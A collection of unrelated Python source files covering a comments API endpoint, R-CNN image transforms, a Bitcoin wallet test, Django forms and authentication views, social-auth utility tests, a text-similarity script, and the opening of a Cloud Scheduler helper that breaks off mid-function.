The quantity of last comments to retrieve
@apiExample {curl} Get the latest 5 comments
curl 'https://comments.example.com/latest?limit=5'
@apiUse commentResponse
@apiSuccessExample Example result:
[
{
"website": null,
"uri": "/some",
"author": null,
"parent": null,
"created": 1464912312.123416,
"text": " <p>I want to use MySQL</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"id": 3,
"likes": 1
},
{
"website": null,
"uri": "/other",
"author": null,
"parent": null,
"created": 1464914341.312426,
"text": " <p>I want to use MySQL</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"id": 4,
"likes": 0
}
]
"""
def latest(self, environ, request):
# if the feature is not allowed, don't present the endpoint
if not self.conf.getboolean("latest-enabled"):
return NotFound()
# get and check the limit
bad_limit_msg = "Query parameter 'limit' is mandatory (integer, >0)"
try:
limit = int(request.args['limit'])
except (KeyError, ValueError):
return BadRequest(bad_limit_msg)
if limit <= 0:
return BadRequest(bad_limit_msg)
# retrieve the latest N comments from the DB
all_comments_gen = self.comments.fetchall(limit=None, order_by='created', mode='1')
comments = collections.deque(all_comments_gen, maxlen=limit)
# prepare a special set of fields (except text which is rendered specifically)
fields = {
'author',
'created',
'dislikes',
'id',
'likes',
'mode',
'modified',
'parent',
'text',
'uri',
'website',
}
# process the retrieved comments and build results
result = []
for comment in comments:
processed = {key: comment[key] for key in fields}
processed['text'] = self.isso.render(comment['text'])
result.append(processed)
return JSON(result, 200)
|
py | 7dfabb95cfb425ca7823e5bde83046c63e5e39be | word = input()
index_list = list([])
for index, value in enumerate(word):
ascii_number = ord(value)
if 65 <= ascii_number <= 90:
index_list.append(index)
print(index_list)
|
py | 7dfabba93eb1331a97527f9e4f1c1113dfe5e2c5 | """Transforms for RCNN series."""
from __future__ import absolute_import
import copy
import mxnet as mx
from .. import bbox as tbbox
from .. import image as timage
from .. import mask as tmask
import numpy as np
__all__ = ['load_test',
'FasterRCNNDefaultTrainTransform', 'FasterRCNNDefaultValTransform',
'MaskRCNNDefaultTrainTransform', 'MaskRCNNDefaultValTransform',
'BDDMaskRCNNDefaultTrainTransform','BDDMaskRCNNDefaultValTransform']
def load_test(filenames, short=800, max_size=1280, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225)):
"""A util function to load all images, transform them to tensor by applying
normalizations. This function support 1 filename or list of filenames.
Parameters
----------
filenames : str or list of str
Image filename(s) to be loaded.
short : int, optional, default is 600
Resize image short side to this `short` and keep aspect ratio.
max_size : int, optional, default is 1000
Maximum longer side length to fit image.
This is to limit the input image shape, avoid processing too large image.
mean : iterable of float
Mean pixel values.
std : iterable of float
Standard deviations of pixel values.
Returns
-------
(mxnet.NDArray, numpy.ndarray) or list of such tuple
A (1, 3, H, W) mxnet NDArray as input to network, and a numpy ndarray as
original un-normalized color image for display.
If multiple image names are supplied, return two lists. You can use
`zip()`` to collapse it.
"""
if isinstance(filenames, str):
filenames = [filenames]
tensors = []
origs = []
for f in filenames:
img = mx.image.imread(f)
img = timage.resize_short_within(img, short, max_size)
orig_img = img.asnumpy().astype('uint8')
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=mean, std=std)
tensors.append(img.expand_dims(0))
origs.append(orig_img)
if len(tensors) == 1:
return tensors[0], origs[0]
return tensors, origs
class FasterRCNNDefaultTrainTransform(object):
"""Default Faster-RCNN training transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
net : mxnet.gluon.HybridBlock, optional
The faster-rcnn network.
.. hint::
If net is ``None``, the transformation will not generate training targets.
Otherwise it will generate training targets to accelerate the training phase
since we push some workload to CPU workers instead of GPUs.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
box_norm : array-like of size 4, default is (1., 1., 1., 1.)
Std value to be divided from encoded values.
num_sample : int, default is 256
Number of samples for RPN targets.
pos_iou_thresh : float, default is 0.7
Anchors larger than ``pos_iou_thresh`` is regarded as positive samples.
neg_iou_thresh : float, default is 0.3
Anchors smaller than ``neg_iou_thresh`` is regarded as negative samples.
Anchors with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
pos_ratio : float, default is 0.5
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
to be sampled.
"""
def __init__(self, short=600, max_size=1000, net=None, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225), box_norm=(1., 1., 1., 1.),
num_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3,
pos_ratio=0.5, **kwargs):
self._short = short
self._max_size = max_size
self._mean = mean
self._std = std
self._anchors = None
if net is None:
return
# use fake data to generate fixed anchors for target generation
ashape = 128
# in case network has reset_ctx to gpu
anchor_generator = copy.deepcopy(net.rpn.anchor_generator)
anchor_generator.collect_params().reset_ctx(None)
anchors = anchor_generator(
mx.nd.zeros((1, 3, ashape, ashape))).reshape((1, 1, ashape, ashape, -1))
self._anchors = anchors
# record feature extractor for infer_shape
if not hasattr(net, 'features'):
raise ValueError("Cannot find features in network, it is a Faster-RCNN network?")
self._feat_sym = net.features(mx.sym.var(name='data'))
from ....model_zoo.rpn.rpn_target import RPNTargetGenerator
self._target_generator = RPNTargetGenerator(
num_sample=num_sample, pos_iou_thresh=pos_iou_thresh,
neg_iou_thresh=neg_iou_thresh, pos_ratio=pos_ratio,
stds=box_norm, **kwargs)
def __call__(self, src, label):
"""Apply transform to training image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
# random horizontal flip
h, w, _ = img.shape
img, flips = timage.random_flip(img, px=0.5)
bbox = tbbox.flip(bbox, (w, h), flip_x=flips[0])
# to tensor
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
if self._anchors is None:
return img, bbox.astype(img.dtype)
# generate RPN target so cpu workers can help reduce the workload
# feat_h, feat_w = (img.shape[1] // self._stride, img.shape[2] // self._stride)
oshape = self._feat_sym.infer_shape(data=(1, 3, img.shape[1], img.shape[2]))[1][0]
anchor = self._anchors[:, :, :oshape[2], :oshape[3], :].reshape((-1, 4))
gt_bboxes = mx.nd.array(bbox[:, :4])
cls_target, box_target, box_mask = self._target_generator(
gt_bboxes, anchor, img.shape[2], img.shape[1])
return img, bbox.astype(img.dtype), cls_target, box_target, box_mask
class FasterRCNNDefaultValTransform(object):
"""Default Faster-RCNN validation transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
"""
def __init__(self, short=600, max_size=1000,
mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)):
self._mean = mean
self._std = std
self._short = short
self._max_size = max_size
def __call__(self, src, label):
"""Apply transform to validation image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
# no scaling ground-truth, return image scaling ratio instead
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
im_scale = h / float(img.shape[0])
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
return img, bbox.astype('float32'), mx.nd.array([im_scale])
class MaskRCNNDefaultTrainTransform(object):
"""Default Mask RCNN training transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
net : mxnet.gluon.HybridBlock, optional
The Mask R-CNN network.
.. hint::
If net is ``None``, the transformation will not generate training targets.
Otherwise it will generate training targets to accelerate the training phase
since we push some workload to CPU workers instead of GPUs.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
box_norm : array-like of size 4, default is (1., 1., 1., 1.)
Std value to be divided from encoded values.
num_sample : int, default is 256
Number of samples for RPN targets.
pos_iou_thresh : float, default is 0.7
Anchors larger than ``pos_iou_thresh`` is regarded as positive samples.
neg_iou_thresh : float, default is 0.3
Anchors smaller than ``neg_iou_thresh`` is regarded as negative samples.
Anchors with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
pos_ratio : float, default is 0.5
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
to be sampled.
"""
def __init__(self, short=600, max_size=1000, net=None, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225), box_norm=(1., 1., 1., 1.),
num_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3,
pos_ratio=0.5, **kwargs):
self._short = short
self._max_size = max_size
self._mean = mean
self._std = std
self._anchors = None
if net is None:
return
# use fake data to generate fixed anchors for target generation
ashape = 128
# in case network has reset_ctx to gpu
anchor_generator = copy.deepcopy(net.rpn.anchor_generator)
anchor_generator.collect_params().reset_ctx(None)
anchors = anchor_generator(
mx.nd.zeros((1, 3, ashape, ashape))).reshape((1, 1, ashape, ashape, -1))
self._anchors = anchors
# record feature extractor for infer_shape
if not hasattr(net, 'features'):
raise ValueError("Cannot find features in network, it is a Mask RCNN network?")
self._feat_sym = net.features(mx.sym.var(name='data'))
from ....model_zoo.rpn.rpn_target import RPNTargetGenerator
self._target_generator = RPNTargetGenerator(
num_sample=num_sample, pos_iou_thresh=pos_iou_thresh,
neg_iou_thresh=neg_iou_thresh, pos_ratio=pos_ratio,
stds=box_norm, **kwargs)
def __call__(self, src, label, segm):
"""Apply transform to training image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
segm = [tmask.resize(polys, (w, h), (img.shape[1], img.shape[0])) for polys in segm]
# random horizontal flip
h, w, _ = img.shape
img, flips = timage.random_flip(img, px=0.5)
bbox = tbbox.flip(bbox, (w, h), flip_x=flips[0])
segm = [tmask.flip(polys, (w, h), flip_x=flips[0]) for polys in segm]
# gt_masks (n, im_height, im_width) of uint8 -> float32 (cannot take uint8)
masks = [mx.nd.array(tmask.to_mask(polys, (w, h))) for polys in segm]
# n * (im_height, im_width) -> (n, im_height, im_width)
masks = mx.nd.stack(*masks, axis=0)
# to tensor
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
if self._anchors is None:
return img, bbox.astype(img.dtype), masks
# generate RPN target so cpu workers can help reduce the workload
# feat_h, feat_w = (img.shape[1] // self._stride, img.shape[2] // self._stride)
oshape = self._feat_sym.infer_shape(data=(1, 3, img.shape[1], img.shape[2]))[1][0]
anchor = self._anchors[:, :, :oshape[2], :oshape[3], :].reshape((-1, 4))
gt_bboxes = mx.nd.array(bbox[:, :4])
cls_target, box_target, box_mask = self._target_generator(
gt_bboxes, anchor, img.shape[2], img.shape[1])
return img, bbox.astype(img.dtype), masks, cls_target, box_target, box_mask
class MaskRCNNDefaultValTransform(object):
"""Default Mask RCNN validation transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
"""
def __init__(self, short=600, max_size=1000,
mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)):
self._mean = mean
self._std = std
self._short = short
self._max_size = max_size
def __call__(self, src, label, mask):
"""Apply transform to validation image/label."""
# resize shorter side but keep in max_size
h, _, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
# no scaling ground-truth, return image scaling ratio instead
im_scale = float(img.shape[0]) / h
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
return img, mx.nd.array([img.shape[-2], img.shape[-1], im_scale])
class BDDMaskRCNNDefaultTrainTransform(object):
"""Default Mask RCNN training transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
net : mxnet.gluon.HybridBlock, optional
The Mask R-CNN network.
.. hint::
If net is ``None``, the transformation will not generate training targets.
Otherwise it will generate training targets to accelerate the training phase
since we push some workload to CPU workers instead of GPUs.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
box_norm : array-like of size 4, default is (1., 1., 1., 1.)
Std value to be divided from encoded values.
num_sample : int, default is 256
Number of samples for RPN targets.
pos_iou_thresh : float, default is 0.7
Anchors larger than ``pos_iou_thresh`` is regarded as positive samples.
neg_iou_thresh : float, default is 0.3
Anchors smaller than ``neg_iou_thresh`` is regarded as negative samples.
Anchors with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
pos_ratio : float, default is 0.5
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
to be sampled.
"""
def __init__(self, short=600, max_size=1000, net=None, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225), box_norm=(1., 1., 1., 1.),
num_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3,
pos_ratio=0.5, segm_scale=0.25, one_hot_label=False, **kwargs):
self._short = short
self._max_size = max_size
self._segm_scale = segm_scale
self._one_hot_label = one_hot_label
self._mean = mean
self._std = std
self._anchors = None
if net is None:
return
print('BDDMaskRCNNDefaultTrainTransform use one_hot label', one_hot_label)
# use fake data to generate fixed anchors for target generation
ashape = 128
# in case network has reset_ctx to gpu
anchor_generator = copy.deepcopy(net.rpn.anchor_generator)
anchor_generator.collect_params().reset_ctx(None)
anchors = anchor_generator(
mx.nd.zeros((1, 3, ashape, ashape))).reshape((1, 1, ashape, ashape, -1))
self._anchors = anchors
# record feature extractor for infer_shape
if not hasattr(net, 'features'):
raise ValueError("Cannot find features in network, it is a Mask RCNN network?")
self._feat_sym = net.features(mx.sym.var(name='data'))
from ....model_zoo.rpn.rpn_target import RPNTargetGenerator
self._target_generator = RPNTargetGenerator(
num_sample=num_sample, pos_iou_thresh=pos_iou_thresh,
neg_iou_thresh=neg_iou_thresh, pos_ratio=pos_ratio,
stds=box_norm, **kwargs)
def __call__(self, src, label, segm):
"""Apply transform to training image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
segm = timage.resize_short_within(segm, self._short * self._segm_scale, self._max_size * self._segm_scale, interp=1)
# random horizontal flip
h, w, _ = img.shape
img, flips = timage.random_flip(img, px=0.5)
bbox = tbbox.flip(bbox, (w, h), flip_x=flips[0])
segm = timage.flip_likes(segm, flip_x=flips[0], flip_y=flips[1])
# to tensor
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
drivable_maps = mx.nd.image.to_tensor(segm)
if self._anchors is None:
return img, bbox.astype(img.dtype), drivable_maps
drivable_maps = drivable_maps * 127.5
if self._one_hot_label:
drivable_maps = drivable_maps * 2
a,b,c = mx.nd.split(drivable_maps, axis=0, num_outputs=3)
a = a==0.
b = b==1.
c = c==2.
drivable_maps = mx.nd.concat(a,b,c,dim=0)
# print(drivable_maps.shape) #3x180x320
# generate RPN target so cpu workers can help reduce the workload
# feat_h, feat_w = (img.shape[1] // self._stride, img.shape[2] // self._stride)
oshape = self._feat_sym.infer_shape(data=(1, 3, img.shape[1], img.shape[2]))[1][0]
anchor = self._anchors[:, :, :oshape[2], :oshape[3], :].reshape((-1, 4))
gt_bboxes = mx.nd.array(bbox[:, :4])
cls_target, box_target, box_mask = self._target_generator(
gt_bboxes, anchor, img.shape[2], img.shape[1])
# print('drivable_maps' , mx.nd.sum(drivable_maps >= 1))
return img, bbox.astype(img.dtype), drivable_maps, cls_target, box_target, box_mask
class BDDMaskRCNNDefaultValTransform(object):
"""Default Mask RCNN validation transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
"""
def __init__(self, short=600, max_size=1000,
mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225), segm_scale=0.25, one_hot_label=False):
self._mean = mean
self._std = std
self._short = short
self._max_size = max_size
self._segm_scale = segm_scale
self._one_hot_label = one_hot_label
def __call__(self, src, label, mask, filepath):
"""Apply transform to validation image/label."""
# resize shorter side but keep in max_size
h, _, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
# no scaling ground-truth, return image scaling ratio instead
im_scale = float(img.shape[0]) / h
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
# mask = timage.resize_short_within(mask, self._short * self._segm_scale, self._max_size * self._segm_scale, interp=1)
return img, mx.nd.array([img.shape[-2], img.shape[-1], im_scale]), filepath
|
py | 7dfabc96ad7668fa87654e57291ae9e1a4626de2 | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
class CreateTxWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.log.info('Check that we have some (old) blocks and that anti-fee-sniping is disabled')
self.bump_mocktime(8 * 60 * 60 + 1)
assert_equal(self.nodes[0].getblockchaininfo()['blocks'], 200)
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tx = self.nodes[0].decoderawtransaction(self.nodes[0].gettransaction(txid)['hex'])
assert_equal(tx['locktime'], 0)
self.log.info('Check that anti-fee-sniping is enabled when we mine a recent block')
self.nodes[0].generate(1)
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tx = self.nodes[0].decoderawtransaction(self.nodes[0].gettransaction(txid)['hex'])
assert 0 < tx['locktime'] <= 201
if __name__ == '__main__':
CreateTxWalletTest().main()
|
py | 7dfabdc83291032d18003876929b0660583e9adc | from gcpdjango.apps.main.models import Project, FormTemplate
from bootstrap_datepicker_plus import DatePickerInput
from django import forms
class ProjectForm(forms.ModelForm):
class Meta:
model = Project
# Group is associated to the user creating the project
fields = ("name", "description", "contact")
def __init__(self, *args, **kwargs):
super(ProjectForm, self).__init__(*args, **kwargs)
for visible in self.visible_fields():
visible.field.widget.attrs["class"] = "form-control"
class FormTemplateForm(forms.ModelForm):
"""A form to populate a project template. Commented out fields are
not required for stage 1
"""
stage = 1
class Meta:
model = FormTemplate
widgets = {
"start_date": DatePickerInput(),
"end_date": DatePickerInput(),
}
fields = (
"name",
"start_date",
"end_date",
"target_audience_disciplines",
"target_audience_roles",
"target_audience_across_orgs",
"target_audience_within_org",
"target_audience_teams_across_orgs",
"implement_strategy_description",
"consider_system_factors",
"consider_org_factors",
"consider_clinical_factors",
"consider_sustainment_strategy",
"outcome_reach",
"outcome_effectiveness",
"outcome_adoption",
"outcome_quality",
"outcome_cost",
"outcome_maintenance",
"outcome_other",
"implementation_recruited",
"implementation_participants",
"implementation_enrolled",
"implementation_completing_half",
"implementation_completing_majority",
"results_reach",
"results_effectiveness",
"results_adoption",
"results_quality",
"results_cost",
"results_maintenance",
"results_other",
)
def __init__(self, *args, **kwargs):
super(FormTemplateForm, self).__init__(*args, **kwargs)
for visible in self.visible_fields():
visible.field.widget.attrs["class"] = "form-control"
|
py | 7dfabe44a306ba6b205a1740e4c724c913ac1fa0 | import sys
import unittest
from sure import expect
from social.utils import sanitize_redirect, user_is_authenticated, \
user_is_active, slugify, build_absolute_uri
PY3 = sys.version_info[0] == 3
class SanitizeRedirectTest(unittest.TestCase):
def test_none_redirect(self):
expect(sanitize_redirect('myapp.com', None)).to.equal(None)
def test_empty_redirect(self):
expect(sanitize_redirect('myapp.com', '')).to.equal(None)
def test_dict_redirect(self):
expect(sanitize_redirect('myapp.com', {})).to.equal(None)
def test_invalid_redirect(self):
expect(sanitize_redirect('myapp.com',
{'foo': 'bar'})).to.equal(None)
def test_wrong_path_redirect(self):
expect(sanitize_redirect(
'myapp.com',
'http://notmyapp.com/path/'
)).to.equal(None)
def test_valid_absolute_redirect(self):
expect(sanitize_redirect(
'myapp.com',
'http://myapp.com/path/'
)).to.equal('http://myapp.com/path/')
def test_valid_relative_redirect(self):
expect(sanitize_redirect('myapp.com', '/path/')).to.equal('/path/')
class UserIsAuthenticatedTest(unittest.TestCase):
def test_user_is_none(self):
expect(user_is_authenticated(None)).to.equal(False)
def test_user_is_not_none(self):
expect(user_is_authenticated(object())).to.equal(True)
def test_user_has_is_authenticated(self):
class User(object):
is_authenticated = True
expect(user_is_authenticated(User())).to.equal(True)
def test_user_has_is_authenticated_callable(self):
class User(object):
def is_authenticated(self):
return True
expect(user_is_authenticated(User())).to.equal(True)
class UserIsActiveTest(unittest.TestCase):
def test_user_is_none(self):
expect(user_is_active(None)).to.equal(False)
def test_user_is_not_none(self):
expect(user_is_active(object())).to.equal(True)
def test_user_has_is_active(self):
class User(object):
is_active = True
expect(user_is_active(User())).to.equal(True)
def test_user_has_is_active_callable(self):
class User(object):
def is_active(self):
return True
expect(user_is_active(User())).to.equal(True)
class SlugifyTest(unittest.TestCase):
def test_slugify_formats(self):
if PY3:
expect(slugify('FooBar')).to.equal('foobar')
expect(slugify('Foo Bar')).to.equal('foo-bar')
expect(slugify('Foo (Bar)')).to.equal('foo-bar')
else:
expect(slugify('FooBar'.decode('utf-8'))).to.equal('foobar')
expect(slugify('Foo Bar'.decode('utf-8'))).to.equal('foo-bar')
expect(slugify('Foo (Bar)'.decode('utf-8'))).to.equal('foo-bar')
class BuildAbsoluteURITest(unittest.TestCase):
def setUp(self):
self.host = 'http://foobar.com'
def tearDown(self):
self.host = None
def test_path_none(self):
expect(build_absolute_uri(self.host)).to.equal(self.host)
def test_path_empty(self):
expect(build_absolute_uri(self.host, '')).to.equal(self.host)
def test_path_http(self):
expect(build_absolute_uri(self.host, 'http://barfoo.com')) \
.to.equal('http://barfoo.com')
def test_path_https(self):
expect(build_absolute_uri(self.host, 'https://barfoo.com')) \
.to.equal('https://barfoo.com')
def test_host_ends_with_slash_and_path_starts_with_slash(self):
expect(build_absolute_uri(self.host + '/', '/foo/bar')) \
.to.equal('http://foobar.com/foo/bar')
def test_absolute_uri(self):
expect(build_absolute_uri(self.host, '/foo/bar')) \
.to.equal('http://foobar.com/foo/bar')
|
py | 7dfabf806880c03a41eb859697609a708f441a76 | import sys
import nltk
import sklearn
def getText(filename):
f = open(filename, 'r', encoding='UTF-8')
return f.read()
def getVector(filename1, filename2):
words = []
words.append(" ".join(nltk.word_tokenize(getText(filename1))))
words.append(" ".join(nltk.word_tokenize(getText(filename2))))
countVector = sklearn.feature_extraction.text.CountVectorizer()
vec = countVector.fit_transform(words)
#print(vec.toarray())
return sklearn.metrics.pairwise.cosine_similarity(vec[0], vec[1])
def main():
file1 = sys.argv[1]
file2 = sys.argv[2]
print('The content of '+file1+' is:\n'+getText(file1)+'\n')
print('The content of '+file2+' is:\n'+getText(file2)+'\n\n')
print('The cosine_similarity of '+file1+' and ' +
file2+' is: '+str(getVector(file1, file2)[0][0]))
if __name__ == '__main__':
main()
|
py | 7dfabf9149867ee16f8069b5e780d3971f4aefb9 | import jwt
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout, authenticate, login
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.urls import reverse_lazy
from django.utils.http import is_safe_url
from django.utils import timezone
from django.shortcuts import render, redirect, resolve_url
from django.contrib import messages
from django.conf import settings
from users.models import User
from users.forms import LoginForm, RegisterForm, PasswordResetForm, ChangePasswordForm
from users.decorators import guest_only
from users.utils import send_user_email_verification
@guest_only
def register_view(request):
if request.method == 'POST':
form = RegisterForm(request.POST)
if form.is_valid():
user = form.save()
send_user_email_verification(request, user)
messages.success(request, 'Your account has been created!')
return redirect('users:login')
else:
form = RegisterForm()
return render(request, 'users/register.html', {'form': form})
@guest_only
def login_view(request):
redirect_to = request.GET.get('next', None)
if not is_safe_url(url=redirect_to, allowed_hosts=None):
redirect_to = resolve_url('users:profile')
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
login_data = form.cleaned_data['login']
password_data = form.cleaned_data['password']
user = authenticate(username=login_data, password=password_data)
if user:
login(request, user)
return redirect(redirect_to)
else:
messages.error(request, 'Login or password invalid')
else:
form = LoginForm()
return render(request, 'users/login.html', {'form': form})
@login_required
def logout_view(request):
logout(request)
return redirect('home')
@guest_only
def password_reset(request):
if request.method == 'POST':
form = PasswordResetForm(request.POST)
if form.is_valid():
email = form.cleaned_data['email']
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
user = None
if user:
expires = timezone.now() + timezone.timedelta(minutes=5)
token = jwt.encode({'username': user.username, 'exp': expires}, settings.SECRET_KEY, algorithm='HS256')
url = request.build_absolute_uri(reverse_lazy('users:new-password', args=(token,)))
subject = '[Auth App] Please reset your password.'
from_mail = '[email protected]'
to_mail = user.email
text_content = 'content'
html_content = render_to_string('emails/password_reset.html', {'url': url})
send_mail(subject, text_content, from_mail, [to_mail], html_message=html_content)
messages.success(
request, (
'Check your email for a link to reset your password. '
'If it does not appear within a few minutes, check your spam folder.'
)
)
return redirect('users:password-reset')
else:
form = PasswordResetForm()
return render(request, 'users/reset_password.html', {'form': form})
def new_password(request, token):
try:
payload = jwt.decode(token, settings.SECRET_KEY, algorithms=['HS256'])
if request.method == 'POST':
form = ChangePasswordForm(request.POST)
if form.is_valid():
password = form.cleaned_data['password']
user = User.objects.get(username=payload['username'])
user.set_password(password)
user.save()
messages.success(request, 'Your password has been changed successfully!')
return redirect('users:login')
else:
form = ChangePasswordForm()
return render(request, 'users/new_password.html', {'username': payload['username'], 'form': form})
except jwt.ExpiredSignatureError:
messages.error(request, 'Your password reset token has been expired.')
except jwt.InvalidTokenError:
messages.error(request, 'Your password reset token is invalid.')
return redirect('users:password-reset')
|
py | 7dfac0c36ed09e27919b288d7e385261541f2c22 | # coding=utf-8
# Copyright 2021 Google LLC..
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manage operations on Cloud Scheduler."""
import logging
from typing import Any, Dict, Optional, Tuple
import dataclasses
from googleapiclient import errors
from dependencies.cloud.utils import cloud_auth
# Default Cloud Scheduler configuration.
_LOCATION = 'us-central1'
_CLIENT_NAME = 'cloudscheduler'
_VERSION = 'v1beta1'
_TIMEZONE = 'GMT'
@dataclasses.dataclass
class AppEngineTarget:
"""A simple class representing the AppEngineTarget of the job."""
http_method: str
relative_uri: str
service: str
@dataclasses.dataclass
class HttpTarget:
"""A simple class representing the HttpTarget of the job."""
http_method: str
uri: str
body: str
headers: Dict[str, str]
# A tuple containing the serviceAccountEmail and the scope if
# authorization_header_type is equal to 'oauthToken', or audience if the
# authorization_header_type is equal to 'oidcToken'
authorization_header: Optional[Tuple[str, str]] = None
# One of: 'oauthToken', 'oidcToken'
authorization_header_type: Optional[str] = ''
class Error(Exception):
"""A generic error thrown for any exception in cloud_scheduler module."""
pass
class CloudSchedulerUtils:
"""CloudSchedulerUtils class provides methods to manage Cloud Scheduler.
This class manages Cloud Scheduler service within a single GCP project.
Typical usage example:
>>> scheduler = CloudSchedulerUtils(
'project_id',
'us-west1',
'[email protected]')
>>> scheduler.create_appengine_http_get_job(
'cron_schedule',
'appengine_relative_uri',
'* * * * 1',
appengine_target_instance)
"""
def __init__(self,
project_id: str,
location: str = _LOCATION,
service_account_name: Optional[str] = None,
service_account_key_file: Optional[str] = None,
version: str = _VERSION):
"""Initializes new instance of CloudSchedulerUtils.
Args:
project_id: GCP project id.
location: Optional. Region under which the Cloud Scheduler needs to be
managed. It defaults to 'us-central1'. Allowed values -
https://cloud.google.com/compute/docs/regions-zones/.
service_account_name: The service account name.
service_account_key_file: Optional. File containing service account key.
If not passed the default credential will be used. There are following
ways to create service accounts: 1. Use `build_service_client` method
from `cloud_auth` module. 2. Use `gcloud` command line utility as
documented here -
https://cloud.google.com/iam/docs/creating-managing-service-account-keys
version: The version of the service. It defaults to 'v1beta1'.
Raises:
ValueError: If neither service_account_key_file or service_account_name
were provided.
"""
if not service_account_key_file and not service_account_name:
raise ValueError(
